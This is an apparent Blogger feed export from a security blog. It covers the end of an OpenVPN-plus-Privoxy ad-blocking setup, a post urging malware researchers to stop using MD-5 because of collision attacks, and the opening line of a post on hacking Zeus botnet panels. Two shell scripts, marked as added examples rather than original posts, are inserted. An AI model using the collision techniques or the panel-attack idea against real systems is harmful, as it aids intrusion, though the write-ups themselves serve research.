<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmmK5DNgqHBB_ug_O9JdjAUyCcdxOWvn7Ea5a-xi0yIQ-MpVhRKtsdR8IL89WnQPZqEHt4X_LGnNL4vTtWbJ2kXd3FfuTfZ0Hn7IAEgtjBC2sHHWLv-_Y4Y_Yv9bLzJ6svM_V83FzDkOP_/s1600/openvpn1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmmK5DNgqHBB_ug_O9JdjAUyCcdxOWvn7Ea5a-xi0yIQ-MpVhRKtsdR8IL89WnQPZqEHt4X_LGnNL4vTtWbJ2kXd3FfuTfZ0Hn7IAEgtjBC2sHHWLv-_Y4Y_Yv9bLzJ6svM_V83FzDkOP_/s1600/openvpn1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0UvqgEL8xXAhyphenhyphenbHk0UYazs8_uRyngk4Wu0nTb3SNNtgtZAbd8BmIxZcQLwbtkDXVWk5Z3HrYEtBhQfhojGS58FNLr3d_vGKcqhyphenhyphenc-CL-z8YMM7MKf3DAoECSY-OYOCmOqSY_1XWmuP0gD/s1600/openvpn2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0UvqgEL8xXAhyphenhyphenbHk0UYazs8_uRyngk4Wu0nTb3SNNtgtZAbd8BmIxZcQLwbtkDXVWk5Z3HrYEtBhQfhojGS58FNLr3d_vGKcqhyphenhyphenc-CL-z8YMM7MKf3DAoECSY-OYOCmOqSY_1XWmuP0gD/s1600/openvpn2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFVTTlidrVK0jbEpaS0OagKwByUaqomvExXPyYnsm-SGi0XLxTtuS4oI7w-RZTiFJ9slvo3nQL29H2gBXE-hl0bWLK2cCgDqgLNrb4KCYV-IKJPUqnOgJgAEqFj-h1ozwNyGcu4CSEQpUs/s1600/openvpn3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFVTTlidrVK0jbEpaS0OagKwByUaqomvExXPyYnsm-SGi0XLxTtuS4oI7w-RZTiFJ9slvo3nQL29H2gBXE-hl0bWLK2cCgDqgLNrb4KCYV-IKJPUqnOgJgAEqFj-h1ozwNyGcu4CSEQpUs/s1600/openvpn3.png" width="330" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
<div style="text-align: justify;">
The most important settings:<br />
<br />
<ul>
<li>I prefer to use the TCP 443 and UDP 53 ports for my OpenVPN setup; I'll let the reader guess why. </li>
<li>For good performance, UDP is preferred over TCP. </li>
<li>VPN mode is Layer 3 (routing/NAT).</li>
<li>Don't forget to allow the configured VPN ports in the AWS firewall (security groups). </li>
</ul>
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQsMquSS813nLT0kQhEeBZkPUNlJSWbBnLglpOV7kNRz9VdJmQzo_Ai17gXLByj4iYR5TG1aOwrfC0p2pqjSAJWjKZK0IRCok50ZXd8LkK2NF8bYhLQgTfVaCcDRWDyhLd3tUPdyaOg46A/s1600/aws_security_groups.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQsMquSS813nLT0kQhEeBZkPUNlJSWbBnLglpOV7kNRz9VdJmQzo_Ai17gXLByj4iYR5TG1aOwrfC0p2pqjSAJWjKZK0IRCok50ZXd8LkK2NF8bYhLQgTfVaCcDRWDyhLd3tUPdyaOg46A/s1600/aws_security_groups.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
<div style="text-align: justify;">
Other VPN settings:</div>
<div style="text-align: justify;">
<div>
<ul>
<li>Should VPN clients have access to private subnets (non-public networks on the server side)? - Yes</li>
<li>Should client Internet traffic be routed through the VPN? - Yes</li>
</ul>
</div>
<div>
<h2>
Privoxy</h2>
The next component we have to install and configure is Privoxy. As usual, "apt-get install privoxy" just works. The next step is to configure Privoxy via the /etc/privoxy/config file; there are two options to change:</div>
</div>
<div style="text-align: justify;">
<ul>
<li>listen-address your.ip.add.ress:8118</li>
<li>accept-intercepted-requests 1</li>
</ul>
</div>
<div style="text-align: justify;">
Be careful not to allow everyone to access your Privoxy server in the AWS EC2 security groups; make sure it is reachable only by VPN users!<br />
<br />
After everything is set, start Privoxy with "service privoxy start", and add it to the autostart with "update-rc.d privoxy defaults".<br />
<br /></div>
<div style="text-align: justify;">
<h2>
Iptables</h2>
</div>
<div style="text-align: justify;">
And the final step is to configure your iptables chain to forward all web traffic from the VPN clients (the 5.5.0.0/16 source subnet in the rule) to the Privoxy server:<br />
<br /></div>
<div style="text-align: justify;">
<pre class="prettyprint">iptables -t nat -A PREROUTING -s 5.5.0.0/16 -p tcp -m multiport --dports 80,8080,81 -j DNAT --to-destination your.ip.add.ress:8118
</pre>
<br /></div>
<div style="text-align: justify;">
Optionally, you can block access to all other ports as well, so that whatever does not go through your Privoxy won't be reachable.</div>
<div style="text-align: justify;">
Depending on your Linux distribution and preference, you might want to make this rule persistent.<br />
<br /></div>
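The Privoxy and iptables steps above as one script, added here as an example and not code from the original post. The VPN subnet, Privoxy address and port are placeholders taken from the rule above; the INPUT guard and the optional strict FORWARD rules go beyond the post's single rule and implement its "reachable only by VPN users" and "block all other ports" advice.

```shell
#!/bin/sh
# Added example, not part of the original post: the Privoxy and iptables part
# of the privacy-proxy setup. Assumptions (placeholders, change them):
#   VPN_SUBNET  address pool handed to the OpenVPN clients (5.5.0.0/16 as in the post)
#   PROXY_ADDR  the VPN-side IP the server uses for Privoxy ("your.ip.add.ress")
# Without APPLY=1 the script only prints the iptables commands it would run.
VPN_SUBNET="${VPN_SUBNET:-5.5.0.0/16}"
PROXY_ADDR="${PROXY_ADDR:-10.0.0.5}"      # placeholder
PROXY_PORT="${PROXY_PORT:-8118}"
WEB_PORTS="${WEB_PORTS:-80,8080,81}"      # plain-HTTP ports intercepted by Privoxy

# The two /etc/privoxy/config changes from the post. Existing lines for the two
# options are dropped first so the file ends up with exactly one of each.
configure_privoxy() {
    cfg="$1"
    sed -i -e '/^listen-address[[:space:]]/d' \
           -e '/^accept-intercepted-requests[[:space:]]/d' "$cfg"
    printf 'listen-address %s:%s\naccept-intercepted-requests 1\n' \
        "$PROXY_ADDR" "$PROXY_PORT" >> "$cfg"
}

# The post's rule: plain-HTTP traffic from VPN clients is DNATed to Privoxy.
dnat_rule() {
    echo "iptables -t nat -A PREROUTING -s $VPN_SUBNET -p tcp -m multiport --dports $WEB_PORTS -j DNAT --to-destination $PROXY_ADDR:$PROXY_PORT"
}

# Host-level backstop for the "only VPN users may reach Privoxy" warning:
# even if the security group is opened too wide, non-VPN sources are dropped.
proxy_guard_rule() {
    echo "iptables -I INPUT -p tcp --dport $PROXY_PORT ! -s $VPN_SUBNET -j DROP"
}

# Optional lock-down from the post: anything a VPN client sends that is not
# DNS or proxied HTTP is not forwarded (HTTPS included, see "Known issues").
# Inserted at the top of FORWARD so they win over the VPN server's own rules;
# emitted in reverse order so that the DNS ACCEPT ends up above the DROP.
strict_forward_rules() {
    echo "iptables -I FORWARD -s $VPN_SUBNET -j DROP"
    echo "iptables -I FORWARD -s $VPN_SUBNET -p udp --dport 53 -j ACCEPT"
}

all_rules() {
    dnat_rule
    proxy_guard_rule
    if [ "${STRICT:-0}" = "1" ]; then strict_forward_rules; fi
}

if [ "${APPLY:-0}" = "1" ]; then
    configure_privoxy /etc/privoxy/config
    all_rules | sh -e
    service privoxy restart
else
    echo "# dry run, set APPLY=1 (as root) to execute:"
    all_rules
fi
```

Persisting the rules across reboots is left to your distribution's tooling, as the post notes.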
<div style="text-align: justify;">
<h3>
Final test</h3>
</div>
<div style="text-align: justify;">
Now you can connect to the VPN server from your Android device.<br />
<div>
After logging in from a client, you get the following nice packages to install on your device:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5NelhkkIV3tQLuEpA1kIFlZ9Yjz2Bnwj8GUh50puoTo96_UbEsfsHMINVEDXF4mGrzdKxQ_IJd6o2_DjbUOlaWL9FyKnb2nprGVH1O7ZBRivgYf5sfbiEdmpccNQJInAeUvtMrwHrRHen/s1600/openvpn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5NelhkkIV3tQLuEpA1kIFlZ9Yjz2Bnwj8GUh50puoTo96_UbEsfsHMINVEDXF4mGrzdKxQ_IJd6o2_DjbUOlaWL9FyKnb2nprGVH1O7ZBRivgYf5sfbiEdmpccNQJInAeUvtMrwHrRHen/s1600/openvpn.png" width="297" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVlq2oOM-J54RiUA2lZ1EnUmFam2rVcJAxWINkEFb-sos4DZzevf0TbVXNZvL2uea5Li7AEgFYzUIiSpFUtg0QaTxTXFabc1BY9Nkr8w5fHEHPvTyotgz1T8VT4qtXQhHnK_S0qgI-eBa_/s1600/2014-04-01+08.57.36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVlq2oOM-J54RiUA2lZ1EnUmFam2rVcJAxWINkEFb-sos4DZzevf0TbVXNZvL2uea5Li7AEgFYzUIiSpFUtg0QaTxTXFabc1BY9Nkr8w5fHEHPvTyotgz1T8VT4qtXQhHnK_S0qgI-eBa_/s1600/2014-04-01+08.57.36.png" width="180" /></a></div>
<div>
<br /></div>
After connecting, the final results can be seen in the following screenshots. And yes, there is a reason I chose <a href="http://www.fireeye.com/blog/technical/mobile-threats/2014/03/a-little-bird-told-me-personal-information-sharing-in-angry-birds-and-its-ad-libraries.html">Angry Birds</a> as an example.<br />
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwVC_5ZRpT2vltWtAATm8FPzl_if3B7I8sKy4tvwosAqcLQRv02TAL7lKIPmK7f4ZJKsWvjkVrLL3z5Ky_tLwT-UXqJyOY8irBYF-pPsqBvWrkh4MyKNd7k5s7sWHzjf2JnNr8kFptsp6p/s1600/2014-03-28+22.10.53.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwVC_5ZRpT2vltWtAATm8FPzl_if3B7I8sKy4tvwosAqcLQRv02TAL7lKIPmK7f4ZJKsWvjkVrLL3z5Ky_tLwT-UXqJyOY8irBYF-pPsqBvWrkh4MyKNd7k5s7sWHzjf2JnNr8kFptsp6p/s1600/2014-03-28+22.10.53.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Angry Birds without Privoxy</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPm37ogJwN6mn0Sj_Den7qslw5DhbG3uCGN7LbSs1fRDHTEnfscNgELxrLeAo4OehYePfVKDoFJlYBCrTOb9aYb4LQJsYK58aK5JAlgbl9iBL8fGbrmjbtFz7Te4eHQuXvCLhNjjc4lM2y/s1600/2014-03-28+22.13.21.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPm37ogJwN6mn0Sj_Den7qslw5DhbG3uCGN7LbSs1fRDHTEnfscNgELxrLeAo4OehYePfVKDoFJlYBCrTOb9aYb4LQJsYK58aK5JAlgbl9iBL8fGbrmjbtFz7Te4eHQuXvCLhNjjc4lM2y/s1600/2014-03-28+22.13.21.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Angry Birds with Privoxy</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv57Qx5RzJfTcSZdDRBbQAmglBlukjWPMDfH5QQamayOgNqBThtnj1gHL6aRBzQJ3BqvtNDkDIkkqen31SRy30YEgqRxGnAPIX9AP1YAhrir_VfvsLNi2xZR5blXOe7EAxwlxe0MsBPfWp/s1600/2014-03-28+22.15.11.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv57Qx5RzJfTcSZdDRBbQAmglBlukjWPMDfH5QQamayOgNqBThtnj1gHL6aRBzQJ3BqvtNDkDIkkqen31SRy30YEgqRxGnAPIX9AP1YAhrir_VfvsLNi2xZR5blXOe7EAxwlxe0MsBPfWp/s1600/2014-03-28+22.15.11.png" width="180" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Stupid flashlight app with ad</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6to_fuVWMhrU1U9PvhR_yF_aMjvcp-nCXCGa_-mmOgi7BAlkxYu61jN8mHIGY1uIWCH2uUMql2bIFCvkQc9deXpHoCueYO6hPapXcWIrGgdvqsZcNSzP5ehaMbHB_0xwGkd9ip7Jwg9bk/s1600/2014-03-28+14.22.00.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6to_fuVWMhrU1U9PvhR_yF_aMjvcp-nCXCGa_-mmOgi7BAlkxYu61jN8mHIGY1uIWCH2uUMql2bIFCvkQc9deXpHoCueYO6hPapXcWIrGgdvqsZcNSzP5ehaMbHB_0xwGkd9ip7Jwg9bk/s1600/2014-03-28+14.22.00.png" width="180" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Stupid flashlight app with Privoxy</td></tr>
</tbody></table>
<div style="text-align: justify;">
<b>Spoiler alert</b></div>
<div style="text-align: justify;">
If you are afraid of the NSA tracking you, this post is not for you. If you want to achieve IP-layer anonymity, this post is not for you. As long as you are the only one using that service, it should be trivial to see what could possibly go wrong with that.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Known issues</b></div>
<div style="text-align: justify;">
Whenever the Internet connection (Wifi, 3G) drops, the VPN connection drops as well, and your privacy is gone ...</div>
<div style="text-align: justify;">
Sites that breach your privacy over SSL can still do so, as long as the domain is not on the Privoxy blacklist.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Additional recommendation</b></div>
<div style="text-align: justify;">
If you are using OSX or Windows, I can recommend Aviator as your default browser. It is just great, give it a try!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>PS:</b> There are also some <a href="https://adblockplus.org/blog/adblock-plus-for-android-removed-from-google-play-store">adblock apps removed from the official store</a> which can block some ads, but you have to configure a proxy for every WiFi connection you use, and it does not work over 3G.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVVTdod23AOgD-EVUqT6vrU0iBe3gR4k8yU2vWx5Gen3PvtY8E8xvCpZNPjsY6FXC2VrDSKAhX7XJid4HpQIuNseNFDzxoGT_Sf5DkiyQqu0MGZLR_ukH2d4klR272T2XaSVtRKJLNwWfJ/s1600/Mikko_Privacy_is_not_negotiable.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVVTdod23AOgD-EVUqT6vrU0iBe3gR4k8yU2vWx5Gen3PvtY8E8xvCpZNPjsY6FXC2VrDSKAhX7XJid4HpQIuNseNFDzxoGT_Sf5DkiyQqu0MGZLR_ukH2d4klR272T2XaSVtRKJLNwWfJ/s1600/Mikko_Privacy_is_not_negotiable.png" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com2tag:blogger.com,1999:blog-7429675726481888518.post-86488491968267849302014-03-25T09:30:00.000+01:002019-10-08T15:59:37.337+02:00Stop using MD-5, now!<div style="text-align: justify;">
TL;DR: <u>Don't use MD-5 to identify malware samples. Believe me, it is a bad idea. Use SHA-256 or a stronger hash function.</u></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This post is dedicated to <a href="https://www.google.com/search?q=md5+malware+-sha&ie=UTF-8#q=md5+malware+trojan+-sha+-sha1+-sha256&tbs=qdr:y" target="_blank">all malware researchers</a> still using MD-5 to identify malware samples.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Before deep-diving into the details, let me explain my view on this topic. Whenever you want to identify a piece of malware, it is only OK to publish its MD-5 hash if you post at least the SHA-256 hash as well. Publishing only the MD-5 hash is <b><u>unprofessional</u></b>. If you want to understand why, please continue reading. If you already know about the problem but want to help me spread the word, please link to my site <a href="http://www.stopusingmd5now.com/" target="_blank">www.stopusingmd5now.com</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
By writing articles/posts/etc. and publishing only the MD-5 hash, the lesser problem is that you show people your incompetence regarding hash functions; the bigger one is that you also teach other people to use MD-5. And it spreads like a disease... Last but not least, if I find a sample on your blog post and you use MD-5 only, I can't be sure we have the same sample.<br />
<br />
Here is a list naming a few bad examples (in Google search rank order):<br />
<ul>
<li><a href="https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware">Kaspersky</a></li>
<li><a href="http://labs.bromium.com/2014/01/13/understanding-malware-targeting-point-of-sale-systems/">Bromium</a></li>
<li><a href="http://www.fireeye.com/blog/technical/malware-research/2013/06/trojan-apt-seinup-hitting-asean.html">Fireeye</a></li>
<li><a href="http://www.webroot.com/blog/2013/10/21/u-k-users-targeted-fake-confirming-sky-offer-themed-malware-serving-emails/">Webroot</a></li>
<li><a href="https://blogs.mcafee.com/mcafee-labs/hesperus-evening-star-shines-as-latest-banker-trojan">Mcafee</a></li>
<li><a href="http://blog.fox-it.com/2013/07/25/analysis-of-the-kins-malware/">Fox-IT</a></li>
<li><a href="http://blogs.cisco.com/security/fake-phone-bills-contain-malware-targeting-dt-customers/">Cisco</a></li>
<li><a href="https://isc.sans.edu/forums/diary/Mr+Jones+wants+you+to+appear+in+court/17279">SANS</a></li>
<li><a href="http://www.welivesecurity.com/wp-content/uploads/2013/08/Brazilian_Malware1.pdf">ESET</a></li>
<li><a href="http://www.symantec.com/security_response/writeup.jsp?docid=2013-091614-5535-99&tabid=2">Symantec</a></li>
<li><a href="http://watchguard.com/docs/datasheet/wg_apt-blocker_ds.pdf" target="_blank">Watchguard</a></li>
<li>And unfortunately, even the best books on malware analysis promote the use of MD-5 - see "Practical malware analysis" Chapter 1 Page 10</li>
</ul>
</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirXsF4XAkg2_c5e9_92kToY5AxO2njO1KqexIza6k2dRwut7md1YGhhFPr51CuwwQrmhcSeHX8HZHZG7hjT_LU3R29i0MJIkehWy-glO3JL-3jNTs6wyrylJXIFFdSFMRnSgUlR3MykSYJ/s1600/46960563.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirXsF4XAkg2_c5e9_92kToY5AxO2njO1KqexIza6k2dRwut7md1YGhhFPr51CuwwQrmhcSeHX8HZHZG7hjT_LU3R29i0MJIkehWy-glO3JL-3jNTs6wyrylJXIFFdSFMRnSgUlR3MykSYJ/s1600/46960563.jpg" width="318" /></a></div>
<br />
<h3 style="text-align: justify;">
Introduction to (cryptographic) hash functions</h3>
<div style="text-align: justify;">
A long time ago (according to some sources since <a href="http://www.cosic.esat.kuleuven.be/publications/article-1532.pdf" target="_blank">1970</a>) people started designing hash functions, for a lot of different reasons. They can be used for file integrity verification, password verification, pseudo-random generation, etc. But one of the most important properties of a cryptographic hash function is that it can "uniquely" identify a block of data with a small, fixed-size bit string. E.g., malware can be identified by the hash alone, so everybody who has the same malware sample will have the same hash; thus they can refer to the malware by the hash itself.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It is easy to conclude that there will always be collisions, where different blocks of data have the same hash. The domain (blocks of data) is infinite, while the codomain (possible hash values) is finite. The question is how easy it is to find two different blocks of data having the same hash. Mathematicians call this property "<a href="http://en.wikipedia.org/wiki/Cryptographic_hash_function#Properties" target="_blank">collision resistance</a>." Proper cryptographic hash functions are collision-resistant, meaning it is impractical or impossible to find two different blocks of data which have the same hash.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In 1989 Ronald Rivest (the R in RSA) designed the MD-2 hashing algorithm. <a href="http://en.wikipedia.org/wiki/MD2_(cryptography)#Security" target="_blank">Since 1997</a> there have been publications showing that this hashing algorithm is far from perfect.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In 1990 Ronald Rivest designed the MD-4 algorithm, which has been considered broken <a href="http://en.wikipedia.org/wiki/MD4#Security" target="_blank">at least since 1991</a>. But MD-4 is still in use from Windows XP to Windows 8 in the password protocol (NTLM). Unfortunately, there are more significant problems with NTLM besides its use of MD-4, but that could be the topic of a different blog post.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In 1991 (you might guess who) designed yet another hashing algorithm, called MD-5, to replace MD-4 (because of the known weaknesses). But again, since 1993 it has been shown many times that MD-5 is broken as well. According to Wikipedia, "On 18 March 2006, Klima published an algorithm [17] that can find a collision within one minute on a single notebook computer, using a method he calls tunneling". This means that with the 8-year-old computing power of a single notebook, one can create two different files having the same MD-5 hash. But the algorithms for generating collisions have improved since, and "a 2013 attack by Xie Tao, Fanbao Liu, and Dengguo Feng breaks MD-5 collision resistance in 2^18 time. This attack runs in less than a second on a regular computer." The key takeaway here is that it is pretty damn hard to design a secure cryptographic hash function which is fast but still safe. I bet that if I developed a hash function, Ron would be able to break it in minutes.</div>
<div style="text-align: justify;">
<br />
Now, dear malware researcher, consider the following scenario. You, as a malware analyst, find a new binary sample. You calculate the MD-5 hash of the malware and <a href="https://www.google.com/search?q=md5+malware+-sha&ie=UTF-8#q=md5+malware+trojan+-sha+-sha1+-sha256&tbs=qdr:y" target="_blank">Google for that hash</a>. You see this hash value on other malware researchers' sites or on a sandbox/vendor's site. That site concludes that the sample does this or that, and is either malicious or not. Either because the site is also relying solely on MD-5, or because you have only checked the MD-5 and the researcher or sandbox has a good reputation, you move on and forget this binary. But in reality, it is possible that your binary is totally different from the one analyzed by others. The results of this mistake can range from nothing to catastrophic.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you don't believe me, just check hello.exe and erase.exe on <a href="http://www.mscs.dal.ca/~selinger/md5collision/">this site from Peter Selinger</a>. Same MD-5, different binaries; a harmless one and a (fake) malicious one... And you can do the same easily at home. No supercomputers, no NSA magic needed.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
On a side note, it is important to mention that even today <a href="http://en.wikipedia.org/wiki/MD5#Preimage_vulnerability" target="_blank">it can be hard to find</a> a block of data (in general) if only its MD-5 hash is known ("pre-image resistance"). I have heard people arguing this when I told them that using MD-5 as a password hash function is a bad idea. The main problem with MD-5 as a password hash is not the weaknesses in MD-5 itself, but the lack of <a href="http://en.wikipedia.org/wiki/Salt_(cryptography)" target="_blank">salt</a>, lack of <a href="http://en.wikipedia.org/wiki/PBKDF2" target="_blank">iterations</a>, and lack of <a href="http://en.wikipedia.org/wiki/Scrypt" target="_blank">memory hardness</a>. But still, I don't see any reason why you should use MD-5 as a building block for anything that has anything to do with security. Would you drive your children to school in a car that has not been maintained in the last 23 years? If your answer is yes, you should have neither children nor a job in IT SEC.</div>
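A small linter for the rule the post argues for (no MD-5 without a SHA-256 next to it), added here as an example and not part of the original post. It classifies hex tokens in a report by length and fails the file when MD5s appear without any SHA-256; the demo files and the sample they hash are constructed, not real malware.

```shell
#!/bin/sh
# Added example, not from the original post: lint a report for the "MD-5 only"
# mistake. Tokens of hex digits are classified by length (32 = MD5, 40 = SHA-1,
# 64 = SHA-256); a file passes if it has no MD5, or carries at least one SHA-256
# next to its MD5s, which is the minimum the post asks for.

# One lowercased hex-looking token per line; non-alphanumerics are separators,
# so a 64-digit SHA-256 is never mistaken for a 32-digit MD5 inside it.
hash_tokens() {
    tr -c '[:alnum:]' '\n' < "$1" | tr 'A-F' 'a-f' | grep -E '^[0-9a-f]+$' || true
}

# Number of tokens in file $1 that are exactly $2 hex digits long.
count_hashes() {
    hash_tokens "$1" | grep -cE '^[0-9a-f]{'"$2"'}$' || true
}

# Verdict for one file: returns 0 (ok) or 1 (md5-only) and prints a summary.
check_report() {
    md5=$(count_hashes "$1" 32)
    sha1=$(count_hashes "$1" 40)
    sha256=$(count_hashes "$1" 64)
    if [ "$md5" -gt 0 ] && [ "$sha256" -eq 0 ]; then
        echo "md5-only  ($md5 MD5, $sha1 SHA-1, 0 SHA-256): $1"
        return 1
    fi
    echo "ok        ($md5 MD5, $sha1 SHA-1, $sha256 SHA-256): $1"
    return 0
}

# Self-contained demo on constructed files: one report publishes only the MD5
# of a constructed (harmless) sample, the other adds its SHA-256.
demo() {
    dir=$(mktemp -d)
    printf 'constructed sample, not malware' > "$dir/sample.bin"
    printf 'Sample MD5: %s\n' "$(md5sum "$dir/sample.bin" | cut -d' ' -f1)" > "$dir/bad.txt"
    { cat "$dir/bad.txt"
      printf 'SHA-256: %s\n' "$(sha256sum "$dir/sample.bin" | cut -d' ' -f1)"; } > "$dir/good.txt"
    check_report "$dir/bad.txt" || true
    check_report "$dir/good.txt"
    rm -rf "$dir"
}

if [ "$#" -gt 0 ]; then
    rc=0
    for f in "$@"; do check_report "$f" || rc=1; done
    exit "$rc"
else
    demo
fi
```

Run it with report files as arguments to get a non-zero exit status for any MD5-only report; with no arguments it runs the constructed demo.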
<h3 style="text-align: justify;">
Conclusion</h3>
<div style="text-align: justify;">
If you are a malware researcher and have used MD-5 only to identify malware samples in the past, I suggest you write it down 1000 times: "I promise I won't use MD-5 to identify malware in the future."</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I even made a website dedicated to this problem, <a href="http://www.stopusingmd5now.com/" target="_blank">www.stopusingmd5now.com</a>. The next time you see a post/article/whatever where malware is identified by the MD-5 hash only, please link to this blog post or website, and the world will be a better and more professional place.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio2e5J36WgVwB2-ZGtkXWgNCCnXXghIuTvp90IZeJnU7UZosCVXG0G63XWNNDl3WsPi6JM5WRZ7L_m11bE-M-43ARlWPor5WZck6zto0OQksbCcal7jQLaxc8Bs5OwuJ-_NQHT9miwayMa/s1600/bart-simpson-chalkboard_www-txt2pic-com.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio2e5J36WgVwB2-ZGtkXWgNCCnXXghIuTvp90IZeJnU7UZosCVXG0G63XWNNDl3WsPi6JM5WRZ7L_m11bE-M-43ARlWPor5WZck6zto0OQksbCcal7jQLaxc8Bs5OwuJ-_NQHT9miwayMa/s1600/bart-simpson-chalkboard_www-txt2pic-com.jpg" width="640" /></a></div>
<br />
PS: If you are a forensics investigator, or software developer developing software used in forensics, the same applies to you.<br />
PS 2: If you find this post too provocative and harsh, there is a reason for this ...<br />
<br />
<a href="https://www.blogger.com/null" name="update">Update</a>: I have modified two malware samples (<a href="https://malwr.com/analysis/Y2M4Zjc4OWE0YmExNDA2MWE5YjFhODM5YjliNmI0MTY/">Citadel</a>, <a href="https://malwr.com/analysis/YTc4Zjg0YTM0MTBhNDJiZDk4ZjFlODAwNjEzODM0YWQ/">Atrax</a>) with the help of <a href="https://code.google.com/p/hashclash/">HashClash</a>, and now they have the same MD-5. Many thanks to Marc Stevens for his research, for publishing his code, and for the help given during the collision finding.Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-17041460934667018612014-02-14T11:09:00.000+01:002019-10-08T16:00:32.082+02:00Attacking financial malware botnet panels - Zeus<div style="text-align: justify;">
I played with leaked financial malware recently. When I saw that these panels are written in PHP, my first idea was to hack them. The results are the work of one evening; please don't expect a full pentest report with all vulns found :-)</div>
<div style="text-align: justify;">
<br /></div>
